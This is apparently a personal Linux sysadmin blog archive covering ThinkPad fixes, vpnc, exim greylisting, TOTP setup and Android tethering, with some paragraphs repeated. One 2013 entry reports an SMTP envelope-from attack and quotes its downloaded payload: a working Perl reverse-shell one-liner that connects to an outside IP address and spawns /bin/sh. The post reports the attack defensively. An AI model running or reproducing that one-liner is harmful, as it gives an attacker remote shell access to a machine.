Friday, August 16, 2013
Sunday, July 7, 2013
Sunday, May 5, 2013
SMTP: envelope-from address tries to execute perl
earlier today, found this:
(and someone else, too.)
of course, no one wants to execute the downloaded file a.pl:
...in the meantime i found RedTeam Pentesting GmbH has a detailed advisory on the problem: Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution - here
(and someone else, too.)
of course, no one wants to execute the downloaded file a.pl:
perl -e 'use Socket;$i="178.218.211.118";$p=9000;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'not sure which MTA is vulnerable, yet.
...in the meantime i found RedTeam Pentesting GmbH has a detailed advisory on the problem: Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution - here
Monday, April 30, 2012
Ubuntu Precise on Lenovo Thinkpad X200s
starting from a LTS update to ubuntu precise my X200s ended up with:
"blacklist tpm_tis" (itpm=1 did not help because the autodetect did this already...) and using the cgroup-lite package instead of the cgroup-bin helped (cf. https://groups.google.com/d/topic/linux.debian.kernel/kxNcotFXps8/discussion, and https://bugs.launchpad.net/ubuntu/+source/libcgroup/+bug/838729).
continuing here [http://vminko.org/gentoo_manuals/thinkpad_x200#hotkeys] i did
- /not/ require acpi_sleep=s3_bios - quite the opposite: using it broke suspend functionality
- not try i915.modeset=1 video=1280x800
- not look into too many other thing (because things seemed to work)
then, adding the dkms version for tp_smapi from here [http://www.thinkwiki.org/wiki/Tp_smapi] so far,
- i am not using the hdapsd but
- do use the Battery charge control features
and installing the power-saving-script-for-pm from here [http://axa-ru.blogspot.com/2009/12/ubuntu-910-thinkpad-x200s-power-saving.html]
- my X200s is doing well with Ubuntu Precise.
(well, of course, i still had to get rid of much foo to be able to start a X session with ratpoison...)
legacy resume(): pnp_bus_resume +0x0/0x70 returns -19
PM Device 00:0a failed to resume: error -19
tpm_tis 00:0a: 1.2 TPM (device-id 0x1020, rev-id 6)during suspend.
"blacklist tpm_tis" (itpm=1 did not help because the autodetect did this already...) and using the cgroup-lite package instead of the cgroup-bin helped (cf. https://groups.google.com/d/topic/linux.debian.kernel/kxNcotFXps8/discussion, and https://bugs.launchpad.net/ubuntu/+source/libcgroup/+bug/838729).
continuing here [http://vminko.org/gentoo_manuals/thinkpad_x200#hotkeys] i did
- /not/ require acpi_sleep=s3_bios - quite the opposite: using it broke suspend functionality
- not try i915.modeset=1 video=1280x800
- not look into too many other thing (because things seemed to work)
then, adding the dkms version for tp_smapi from here [http://www.thinkwiki.org/wiki/Tp_smapi] so far,
- i am not using the hdapsd but
- do use the Battery charge control features
and installing the power-saving-script-for-pm from here [http://axa-ru.blogspot.com/2009/12/ubuntu-910-thinkpad-x200s-power-saving.html]
- my X200s is doing well with Ubuntu Precise.
(well, of course, i still had to get rid of much foo to be able to start a X session with ratpoison...)
Thursday, March 1, 2012
personal reminder: Cisco vpn and vpnc
a simple task: use a Cisco configuration (for their own vpn client) but use vpnc...
reading up on Cisco's manual - to understand how the config/their client is configured - seemed like a very good idea:
http://www.cisco.com/en/US/docs/security/vpn_client/cisco_vpn_client/vpn_client46/administration/admin.html
reading up on Cisco's manual - to understand how the config/their client is configured - seemed like a very good idea:
http://www.cisco.com/en/US/docs/security/vpn_client/cisco_vpn_client/vpn_client46/administration/admin.html
unfortunately, i ended with a variant of this
Error: either “to” is duplicate, or “ipid” is a garbage.
which has ben reported here:
vpnc-script incorrectly parses the output of ip route with kernels >= 2.6.38
and also found a solution here:
where it boils down to
"an old version of vpnc-script. This script is what sets up all the addresses and routes for you. The OpenConnect project provides an updated / revised release of this script. Download the latest copy from here . Replace the vpnc-script script that comes with the Ubuntu vpnc package: /etc/vpnc/vpnc-script."
Friday, October 14, 2011
combining greylisting with spam scores - working exim example
...personal experience with greylisting, some inspiration (some i can't remember anymore...), and some thoughts led to the following (implemented) idea:
let's suppose you trust the system's spam score to the extent that
- a low enough spam score is fairly-certainly correct
why not use a low enough threshold to have first-time senders pass by?
let's suppose you trust the system's spam score to the extent that
- a low enough spam score is fairly-certainly correct
why not use a low enough threshold to have first-time senders pass by?
[/etc/exim4/conf.d/acl/40_exim4-config_check_data.rul]
>defer
> ...
> log_message = message deferred: probable spam and greylistd
> message = Message temporarily deferred
> condition = ${if and \
> {\
> { >{$spam_score_int}{75}}\
> {eq{grey}\
> {${readsocket{/var/run/greylistd/socket}\
> {${mask:$sender_host_address/24} \
> $sender_address \
> $local_part@$domain}\
> {5s}{}{}}\
> }\
> }\
> }\
> }
> delay = 4m
Saturday, July 16, 2011
Sunday, March 6, 2011
personal reminder: ratpoison and an empty, gray java GUI
"How to un-break graphical Java apps under Ratpoison" suggests wmname to make the JVM believe it runs on a different window manager:
note for OpenJDK: according to this post "versions of OpenJDK that ship with some operating system distributions—at least Debian (and Ubuntu) and Arch Linux in March and August of 2009, respectively—have had this problem fixed by the vendors."
$ wmname LG3Dimplies the JVM ran on lg3d (Project Looking Glass - a desktop utilizing 3D aspects in the UI), a non-re-parenting window manager written by Sun; this one is on java's hard-coded list of known non-reparenting window managers.
note for OpenJDK: according to this post "versions of OpenJDK that ship with some operating system distributions—at least Debian (and Ubuntu) and Arch Linux in March and August of 2009, respectively—have had this problem fixed by the vendors."
Friday, March 4, 2011
Manually add account to Google Authenticator - Enter key in Base32 Encoding
wanted to use OpenID with Multi-factor authentication as a Single Sign-On (SSO) for online services; in particular, i wanted to combine a regular password with a One-Time Password namely, a TOTP token.
Google Authenticator supports TOTP, and not only for their own 2-step verification but one can "Manually add" other accounts.
The bridging part from TOTP to OpenID, in my case, comes from Clavid (cf. OTP@Clavid).
Now to the tiny bit of information that might save you quite some minutes: when entering your secret key into these two locations to set-up an account
Google Authenticator supports TOTP, and not only for their own 2-step verification but one can "Manually add" other accounts.
The bridging part from TOTP to OpenID, in my case, comes from Clavid (cf. OTP@Clavid).
Now to the tiny bit of information that might save you quite some minutes: when entering your secret key into these two locations to set-up an account
- Google Authenticator expects the string to be RFC4648 Base32 encoded
- Clavid expects the string to be hex encoded
Tuesday, January 4, 2011
personal reminder: rfkill to toggle bluetooth
toggling bluetooth (on a Lenovo ThinkPad X200s / Ubuntu 10.x) via rfkill:
rfkill listrfkill block 0rfkill unblock 0
until https://bugs.launchpad.net/ubuntu/karmic/+source/linux/+bug/395358 is fixed...
Wednesday, December 22, 2010
personal reminder: Secure Programming for Linux and Unix HOWTO
not brand-new but not completely outdated:
Sunday, November 28, 2010
Online Tasks Service for Thunderbird/Lightning
Thunderbird/Lightning has been working with Google Calendar for a while now [cf. link]. however, Tasks are not supported as can be seen in this thread and also here.
now, is there another service for Tasks available?
for some time i have been using Chandler but with recent developments TB/Lightning+Chandler stopped working (and they haven't quite figured out who's to blame...).
ironically, Yahoo comes to the rescue: following this post and going further here Tasks with Yahoo actually work.
now, is there another service for Tasks available?
for some time i have been using Chandler but with recent developments TB/Lightning+Chandler stopped working (and they haven't quite figured out who's to blame...).
ironically, Yahoo comes to the rescue: following this post and going further here Tasks with Yahoo actually work.
Friday, October 15, 2010
Reverse Tethering an Android Phone via USB
until recently i was stuck with a stock android 1.6 - and USB tethering was somewhat adventurous (Tetherbot was an option, connectbot another... both worked best, i.e. without restrictions, when there was a VPN tunneled 'over' either of them.)
now, this set-up can also be used the other way around (i.e. use the computer's internet connection the mobile is connected to). however, android's ConnectivityManager does not recognize this connection in such a way that services like Contacts Sync would get going.
startUsingNetworkFeature() in http://android.git.kernel.org/?p=platform/frameworks/base.git;a=blob;f=services/java/com/android/server/ConnectivityService.java will choke on android.net.NeworkInfo.isAvailable():
D/ConnectivityService( 166): getMobileDataEnabled returning true
D/ConnectivityService( 166): special network not available
D/ConnectivityService( 166): getMobileDataEnabled returning true
D/ConnectivityService( 166): special network not available
Tuesday, August 10, 2010
aptitude or apt-get - only update security updates
two quick possibilities to update security updates only (via apt-get and/or aptitude in debian, ubuntu, ...):
- uses a dedicated sources file: http://www.debian-administration.org/articles/241#comment_20
- uses a search pattern: http://ubuntuforums.org/showpost.php?p=9161314&postcount=3
Friday, May 21, 2010
Dell & Linux - Links to Remember
BIOS updates for Dell computers under linux:
The Dell Linux Wiki PageDell's info on RAID & Storage (aka. PERC thingthings...)
Subscribe to:
Posts (Atom)